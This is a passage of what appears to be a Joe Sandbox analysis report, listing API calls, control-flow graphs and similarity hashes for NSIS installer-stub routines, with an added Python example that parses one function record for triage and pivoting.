• Instruction Fuzzy Hash: 0541D771800114BACF117BB5CD85DAE3679EF45368B21863FF422F11E1D73D8AA19A2D

Control-flow Graph (rendered graph not reproduced; basic blocks that call APIs): 406a26-406a46 GetSystemDirectoryW; 406a60-406a93 wsprintfW, LoadLibraryExW
                                                                                                                                              APIs
                                                                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A3D
                                                                                                                                              • wsprintfW.USER32 ref: 00406A78
                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A8C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                              • String ID: %s%S.dll$UXTHEME
                                                                                                                                              • API String ID: 2200240437-1106614640
                                                                                                                                              • Opcode ID: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                                                                                                              • Instruction ID: 2c328a31db22aac531adf2f34800fe5ee0562984a44f040f64af452ff7173633
                                                                                                                                              • Opcode Fuzzy Hash: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                                                                                                              • Instruction Fuzzy Hash: 36F0FC3060011967CF14BB64DD0EF9B375C9B01704F10847AA546F10D0EB789668CF98
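The function records in this report are machine-generated, but they are also what an analyst pivots on: the Opcode ID and Instruction Fuzzy Hash across samples, the API sequence and String ID across functions. As an added example that is not part of the Joe Sandbox report, the Python below parses one record into a structured form, using the APIs, Source File, one Associated dump, snapshot file and similarity fields of the GetSystemDirectoryW/LoadLibraryExW routine above as constructed input. It cross-checks the dump's process id and image base against the snapshot file name, and flags the load pattern the record shows: the system directory is resolved, "%s%S.dll" is formatted onto it, and LoadLibraryExW is called with dwFlags 00000008, which is the Win32 constant LOAD_WITH_ALTERED_SEARCH_PATH, so UXTHEME is loaded by absolute path from the system directory. Read together with the "NSIS Error" string and the "nsa" GetTempFileNameW prefix in the neighbouring records, that is consistent with the NSIS installer stub, and this particular routine is a defence against DLL search-order hijacking rather than a sign of it. The record field names, the assumption that the first dotted field of the .sdmp name is the process id (0000001B, matching the 27 in hcaresult_27_2_400000_ya.jbxd), and the detection function are this example's own, not the report's.

```python
"""Parse a Joe Sandbox function record (as printed on this page) for triage and pivoting.
Added example; the field names and the checks below are this script's own."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Win32 LoadLibraryEx dwFlags bit: search relative to the given absolute path.
LOAD_WITH_ALTERED_SEARCH_PATH = 0x00000008

# Constructed input: the UXTHEME-loading record from the page (one Associated dump kept).
RECORD = """APIs
• GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A3D
• wsprintfW.USER32 ref: 00406A78
• LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A8C
Strings
Memory Dump Source
• Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_400000_ya.jbxd
Similarity
• API ID: DirectoryLibraryLoadSystemwsprintf
• String ID: %s%S.dll$UXTHEME
• API String ID: 2200240437-1106614640
• Opcode ID: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
• Instruction ID: 2c328a31db22aac531adf2f34800fe5ee0562984a44f040f64af452ff7173633
• Opcode Fuzzy Hash: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
• Instruction Fuzzy Hash: 36F0FC3060011967CF14BB64DD0EF9B375C9B01704F10847AA546F10D0EB789668CF98
"""

# "• Name.MODULE(args), ref: ADDR" with an optional "Part of subcall function ADDR:" prefix
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
KV_LINE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")
SIMILARITY_KEYS = ("API ID", "API String ID", "Opcode ID", "Instruction ID",
                   "Opcode Fuzzy Hash", "Instruction Fuzzy Hash")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]          # hex words as printed; "?" means unresolved
    ref: int                 # address of the call site
    subcall_of: int | None   # set when the call happens inside a callee

    def arg_int(self, index: int) -> int | None:
        """Argument `index` as an int, or None when absent or unresolved."""
        if index >= len(self.args) or self.args[index] == "?":
            return None
        return int(self.args[index], 16)


@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)
    similarity: dict[str, str] = field(default_factory=dict)
    pid: int | None = None          # assumed: first dotted field of the .sdmp name
    image_base: int | None = None   # "Offset:" of the source dump
    snapshot: str | None = None


def parse_record(text: str) -> FunctionRecord:
    rec = FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip()
        m = API_LINE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            rec.apis.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16),
                                    int(m["sub"], 16) if m["sub"] else None))
            continue
        m = KV_LINE.match(line)
        if not m:
            continue
        key, val = m["key"].strip(), m["val"].strip()
        if key == "Source File":
            dump, _, rest = val.partition(",")
            rec.pid = int(dump.split(".")[0], 16)
            off = re.search(r"Offset:\s*([0-9A-F]+)", rest)
            rec.image_base = int(off[1], 16) if off else None
        elif key == "Snapshot File":
            rec.snapshot = val
        elif key == "String ID":
            rec.strings = [s for s in val.split("$") if s]   # "$" separates strings
        elif key in SIMILARITY_KEYS:
            rec.similarity[key] = val
    return rec


def api_sequence(rec: FunctionRecord) -> str:
    """Top-level API order, a cheap key for comparing functions across samples."""
    return ">".join(a.name for a in rec.apis if a.subcall_of is None)


def snapshot_matches(rec: FunctionRecord) -> bool:
    """hcaresult_<pid>_<n>_<base>_... must agree with the dump's pid and image base."""
    m = re.match(r"hcaresult_(\d+)_\d+_([0-9a-f]+)_", rec.snapshot or "")
    return bool(m) and int(m[1]) == rec.pid and int(m[2], 16) == rec.image_base


def loads_from_system_directory(rec: FunctionRecord) -> bool:
    """GetSystemDirectoryW, then '%s%S.dll', then LoadLibraryExW with
    LOAD_WITH_ALTERED_SEARCH_PATH: a full-path load of a system DLL."""
    names = [a.name for a in rec.apis]
    if "GetSystemDirectoryW" not in names or "%s%S.dll" not in rec.strings:
        return False
    for i, call in enumerate(rec.apis):
        if call.name == "LoadLibraryExW":
            flags = call.arg_int(2)   # (lpLibFileName, hFile, dwFlags) as printed
            if flags is not None and flags & LOAD_WITH_ALTERED_SEARCH_PATH:
                return names.index("GetSystemDirectoryW") < i
    return False


if __name__ == "__main__":
    rec = parse_record(RECORD)
    print("sequence:", api_sequence(rec))
    print("pid", rec.pid, "base", hex(rec.image_base), "snapshot ok:", snapshot_matches(rec))
    print("system-directory DLL load:", loads_from_system_directory(rec))
    print("pivot key (Opcode ID):", rec.similarity["Opcode ID"])
```

To pivot, feed every record of a report through `parse_record` and group by `similarity["Opcode ID"]` or by `api_sequence`; the "Part of subcall function" lines are kept with `subcall_of` set so that a callee's APIs are not mistaken for the function's own.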

Control-flow Graph (rendered graph not reproduced; basic blocks that call APIs or subroutines): 40349e-4034c6 GetTickCount; 4034cc-4034f7 call 40361d, SetFilePointer; 403512-403520 call 403607; 403548-403568 call 403053; 403569-403585 call 406c11; 403591-403599 call 406244; 4035d7-4035e6 SetFilePointer; 4035f6-4035fe call 403053
                                                                                                                                              APIs
                                                                                                                                              • GetTickCount.KERNEL32 ref: 004034B2
                                                                                                                                                • Part of subcall function 0040361D: SetFilePointer.KERNEL32(00000000,00000000,00000000,0040331B,?), ref: 0040362B
                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,?,00000000,004033C8,00000004,00000000,00000000,?,?,00403342,000000FF,00000000,00000000,00008001,?), ref: 004034E5
                                                                                                                                              • SetFilePointer.KERNEL32(00045AA4,00000000,00000000,004266F0,00004000,?,00000000,004033C8,00000004,00000000,00000000,?,?,00403342,000000FF,00000000), ref: 004035E0
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FilePointer$CountTick
                                                                                                                                              • String ID: hA
                                                                                                                                              • API String ID: 1092082344-2144240161
                                                                                                                                              • Opcode ID: e11cf52a2002a60f9caf7e4f5257b2a9e139536fe8b899a245e26a0cd04ca586
                                                                                                                                              • Instruction ID: a6cc621958e3896f8f0562ac50284c64eb2e0996e34cc3673b0accbb5e92da07
                                                                                                                                              • Opcode Fuzzy Hash: e11cf52a2002a60f9caf7e4f5257b2a9e139536fe8b899a245e26a0cd04ca586
                                                                                                                                              • Instruction Fuzzy Hash: C231D076504201EFDB209F6AFE419663FACF720356B85823FF901A22F0CB749901AB1D

Control-flow Graph (rendered graph not reproduced; basic blocks that call APIs or subroutines): 406079-406094 call 4066a2, call 40601c; 4060bd-4060c4 call 4069ff; 4060cb-4060cc call 405fbd; 4060d1-4060da lstrlenW; 4060dc-4060f0 call 405f71, GetFileAttributesW
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 004066A2: lstrcpynW.KERNEL32(?,?,00002000,004037D7,00464260,NSIS Error,?,00000008,0000000A,0000000C), ref: 004066AF
                                                                                                                                                • Part of subcall function 0040601C: CharNextW.USER32(?,?,00456750,?,00406090,00456750,00456750,76F93420,?,76F92EE0,00405DCE,?,76F93420,76F92EE0,004BD000), ref: 0040602A
                                                                                                                                                • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 0040602F
                                                                                                                                                • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 00406047
                                                                                                                                              • lstrlenW.KERNEL32(00456750,00000000,00456750,00456750,76F93420,?,76F92EE0,00405DCE,?,76F93420,76F92EE0,004BD000), ref: 004060D2
                                                                                                                                              • GetFileAttributesW.KERNEL32(00456750,00456750,00456750,00456750,00456750,00456750,00000000,00456750,00456750,76F93420,?,76F92EE0,00405DCE,?,76F93420,76F92EE0), ref: 004060E2
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                              • String ID: PgE
                                                                                                                                              • API String ID: 3248276644-3220684765
                                                                                                                                              • Opcode ID: b320ac714881839a993191b9b67f373f4f0dd5a8269bf5d6f48fcd2d5b08a690
                                                                                                                                              • Instruction ID: 4bebfd15c2bd202af51862231bcf25e973859f7a9abf5f27d8efd0e3f4a0fce5
                                                                                                                                              • Opcode Fuzzy Hash: b320ac714881839a993191b9b67f373f4f0dd5a8269bf5d6f48fcd2d5b08a690
                                                                                                                                              • Instruction Fuzzy Hash: 21F07835084A6259E622B7360C05AAF25098F8232470B423FFC43B22C1DF3D8973D17E

Control-flow Graph (rendered graph not reproduced; basic blocks that call APIs): 4061ce-406202 GetTickCount, GetTempFileNameW
                                                                                                                                              APIs
                                                                                                                                              • GetTickCount.KERNEL32 ref: 004061DF
                                                                                                                                              • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403663,004CD000,004D1000,004D1000,004D1000,004D1000,004D1000,004D1000,0040394F), ref: 004061FA
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CountFileNameTempTick
                                                                                                                                              • String ID: nsa
                                                                                                                                              • API String ID: 1716503409-2209301699
                                                                                                                                              • Opcode ID: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
                                                                                                                                              • Instruction ID: f348173cd445ce0cff63ab1922c44f7ab34be52ec2d52f6d3f60174017d9ed76
                                                                                                                                              • Opcode Fuzzy Hash: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
                                                                                                                                              • Instruction Fuzzy Hash: 3BF06D76701204BBEB109B59DD05E9AB7A8EBA1710F11803EEA01A6240E6B099648764

Control-flow Graph (rendered graph not reproduced; blocks span 406c53-406dbb and 4071f5-407662; basic blocks that call APIs): 406cc5-406cc8 GlobalFree; 406cce-406cdc GlobalAlloc; 406d3c-406d3f GlobalFree; 406d45-406d55 GlobalAlloc
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 8001648312b76757b4dc2f3646509216fc345bf83ee85411accbee75f523ad1d
                                                                                                                                              • Instruction ID: 24c32228aea39238aae05165091b6f794a4b9b1c66cd55bc1afee76a19a4bada
                                                                                                                                              • Opcode Fuzzy Hash: 8001648312b76757b4dc2f3646509216fc345bf83ee85411accbee75f523ad1d
                                                                                                                                              • Instruction Fuzzy Hash: 10A14471E04228DBDF28CFA8C8446ADBBB1FF44305F14856ED856BB281C7786A86DF45

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 636 4073f6-4073fa 637 40741c-407429 636->637 638 4073fc-4074fe 636->638 639 40742c-407441 637->639 648 407528-40752c 638->648 642 407443-407459 639->642 643 40745b-407471 639->643 645 407474-40747b 642->645 643->645 646 4074a2 645->646 647 40747d-407481 645->647 653 4074a8-4074ae 646->653 649 407630-40763a 647->649 650 407487-40749f 647->650 651 40758c-40759f 648->651 652 40752e-40754f 648->652 657 407646-407659 649->657 650->646 651->653 654 407551-407566 652->654 655 407568-40757b 652->655 658 406c53 653->658 659 40765b 653->659 660 40757e-407585 654->660 655->660 661 40765e-407662 657->661 662 406c5a-406c5e 658->662 663 406d9a-406dbb 658->663 664 406cff-406d03 658->664 665 406d6f-406d73 658->665 659->661 666 407525 660->666 667 407587 660->667 662->657 668 406c64-406c71 662->668 663->639 672 406d09-406d22 664->672 673 4075af-4075b9 664->673 669 406d79-406d8d 665->669 670 4075be-4075c8 665->670 666->648 677 40750a-407522 667->677 678 40763c 667->678 668->659 675 406c77-406cbd 668->675 676 406d90-406d98 669->676 670->657 674 406d25-406d29 672->674 673->657 674->664 679 406d2b-406d31 674->679 680 406ce5-406ce7 675->680 681 406cbf-406cc3 675->681 676->663 676->665 677->666 678->657 682 406d33-406d3a 679->682 683 406d5b-406d6d 679->683 686 406cf5-406cfd 680->686 687 406ce9-406cf3 680->687 684 406cc5-406cc8 GlobalFree 681->684 685 406cce-406cdc GlobalAlloc 681->685 688 406d45-406d55 GlobalAlloc 682->688 689 406d3c-406d3f GlobalFree 682->689 683->676 684->685 685->659 690 406ce2 685->690 686->674 687->686 687->687 688->659 688->683 689->688 690->680
Memory Dump Source
• Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_400000_ya.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2384488d3f0122d52eec19d06177794e899fdfc3e1a025a719282f78321e7206
• Instruction ID: b8cb9ce97df986fef79018f719ec18ee870a51f75f9c549f23c9243a2682c43e
• Opcode Fuzzy Hash: 2384488d3f0122d52eec19d06177794e899fdfc3e1a025a719282f78321e7206
• Instruction Fuzzy Hash: 48912370D04228CBDF28CF98C8947ADBBB1FF44305F14856AD856BB291C778A986DF45

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 691 40710c-407110 692 407116-40711a 691->692 693 4071c7-4071d6 691->693 694 407120-407134 692->694 695 40765b 692->695 696 40742c-407441 693->696 697 4075fa-407604 694->697 698 40713a-407143 694->698 699 40765e-407662 695->699 700 407443-407459 696->700 701 40745b-407471 696->701 704 407646-407659 697->704 702 407145 698->702 703 407148-407178 698->703 705 407474-40747b 700->705 701->705 702->703 703->693 712 406c44-406c4d 703->712 704->699 706 4074a2-4074ae 705->706 707 40747d-407481 705->707 706->712 709 407630-40763a 707->709 710 407487-40749f 707->710 709->704 710->706 712->695 713 406c53 712->713 714 406c5a-406c5e 713->714 715 406d9a-406dbb 713->715 716 406cff-406d03 713->716 717 406d6f-406d73 713->717 714->704 718 406c64-406c71 714->718 715->696 721 406d09-406d22 716->721 722 4075af-4075b9 716->722 719 406d79-406d8d 717->719 720 4075be-4075c8 717->720 718->695 724 406c77-406cbd 718->724 725 406d90-406d98 719->725 720->704 723 406d25-406d29 721->723 722->704 723->716 726 406d2b-406d31 723->726 727 406ce5-406ce7 724->727 728 406cbf-406cc3 724->728 725->715 725->717 729 406d33-406d3a 726->729 730 406d5b-406d6d 726->730 733 406cf5-406cfd 727->733 734 406ce9-406cf3 727->734 731 406cc5-406cc8 GlobalFree 728->731 732 406cce-406cdc GlobalAlloc 728->732 735 406d45-406d55 GlobalAlloc 729->735 736 406d3c-406d3f GlobalFree 729->736 730->725 731->732 732->695 737 406ce2 732->737 733->723 734->733 734->734 735->695 735->730 736->735 737->727
Memory Dump Source
• Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_400000_ya.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 27b0d047e0c308e0b5114cd8a4e3873cb63df72f9853a9642e586e78b8cecf79
• Instruction ID: 4da454054b0c3dd02772a9c96e50ae6a11cdbe5b18e0bc5540401a1e7d1606fc
• Opcode Fuzzy Hash: 27b0d047e0c308e0b5114cd8a4e3873cb63df72f9853a9642e586e78b8cecf79
• Instruction Fuzzy Hash: E4813471D04228DBDF24CFA8C8847ADBBB1FF45305F24816AD456BB281C778AA86DF45

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 738 406c11-406c34 739 406c36-406c39 738->739 740 406c3e-406c41 738->740 741 40765e-407662 739->741 742 406c44-406c4d 740->742 743 406c53 742->743 744 40765b 742->744 745 406c5a-406c5e 743->745 746 406d9a-407441 743->746 747 406cff-406d03 743->747 748 406d6f-406d73 743->748 744->741 749 406c64-406c71 745->749 750 407646-407659 745->750 759 407443-407459 746->759 760 40745b-407471 746->760 754 406d09-406d22 747->754 755 4075af-4075b9 747->755 751 406d79-406d8d 748->751 752 4075be-4075c8 748->752 749->744 757 406c77-406cbd 749->757 750->741 758 406d90-406d98 751->758 752->750 756 406d25-406d29 754->756 755->750 756->747 761 406d2b-406d31 756->761 762 406ce5-406ce7 757->762 763 406cbf-406cc3 757->763 758->746 758->748 764 407474-40747b 759->764 760->764 767 406d33-406d3a 761->767 768 406d5b-406d6d 761->768 771 406cf5-406cfd 762->771 772 406ce9-406cf3 762->772 769 406cc5-406cc8 GlobalFree 763->769 770 406cce-406cdc GlobalAlloc 763->770 765 4074a2-4074ae 764->765 766 40747d-407481 764->766 765->742 773 407630-40763a 766->773 774 407487-40749f 766->774 776 406d45-406d55 GlobalAlloc 767->776 777 406d3c-406d3f GlobalFree 767->777 768->758 769->770 770->744 778 406ce2 770->778 771->756 772->771 772->772 773->750 774->765 776->744 776->768 777->776 778->762
Memory Dump Source
• Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_400000_ya.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4f111ab4920ac525fdea371edc0372209efebd88f4f49b64d61f26737748280a
• Instruction ID: a75c210e76fb72c91da92bd055febaaadf45c37f1dc492509737fdaa257f63d6
• Opcode Fuzzy Hash: 4f111ab4920ac525fdea371edc0372209efebd88f4f49b64d61f26737748280a
• Instruction Fuzzy Hash: 2D817731D04228DBDF24CFA8C844BADBBB1FF44315F20856AD856BB281C7796A86DF45

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 779 40705f-407063 780 407081-4070c4 779->780 781 407065-40707c 779->781 782 40742c-407441 780->782 781->782 783 407443-407459 782->783 784 40745b-407471 782->784 785 407474-40747b 783->785 784->785 786 4074a2-4074ae 785->786 787 40747d-407481 785->787 793 406c53 786->793 794 40765b 786->794 788 407630-40763a 787->788 789 407487-40749f 787->789 792 407646-407659 788->792 789->786 795 40765e-407662 792->795 796 406c5a-406c5e 793->796 797 406d9a-406dbb 793->797 798 406cff-406d03 793->798 799 406d6f-406d73 793->799 794->795 796->792 800 406c64-406c71 796->800 797->782 803 406d09-406d22 798->803 804 4075af-4075b9 798->804 801 406d79-406d8d 799->801 802 4075be-4075c8 799->802 800->794 806 406c77-406cbd 800->806 807 406d90-406d98 801->807 802->792 805 406d25-406d29 803->805 804->792 805->798 808 406d2b-406d31 805->808 809 406ce5-406ce7 806->809 810 406cbf-406cc3 806->810 807->797 807->799 811 406d33-406d3a 808->811 812 406d5b-406d6d 808->812 815 406cf5-406cfd 809->815 816 406ce9-406cf3 809->816 813 406cc5-406cc8 GlobalFree 810->813 814 406cce-406cdc GlobalAlloc 810->814 817 406d45-406d55 GlobalAlloc 811->817 818 406d3c-406d3f GlobalFree 811->818 812->807 813->814 814->794 819 406ce2 814->819 815->805 816->815 816->816 817->794 817->812 818->817 819->809
Memory Dump Source
• Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_400000_ya.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: eb6308170f34cf48dfcb4d8f9c09bb4bb9b1200d68288f83770d90fe7aa59a96
• Instruction ID: 2ce83fc52b21f36f835e1fdafd5cf74e6ced0850754c4da96a209bb8fab2d9ce
• Opcode Fuzzy Hash: eb6308170f34cf48dfcb4d8f9c09bb4bb9b1200d68288f83770d90fe7aa59a96
• Instruction Fuzzy Hash: 11712471D04228DBDF28CFA8C8847ADBBB1FF48305F15806AD856B7281C778A986DF55
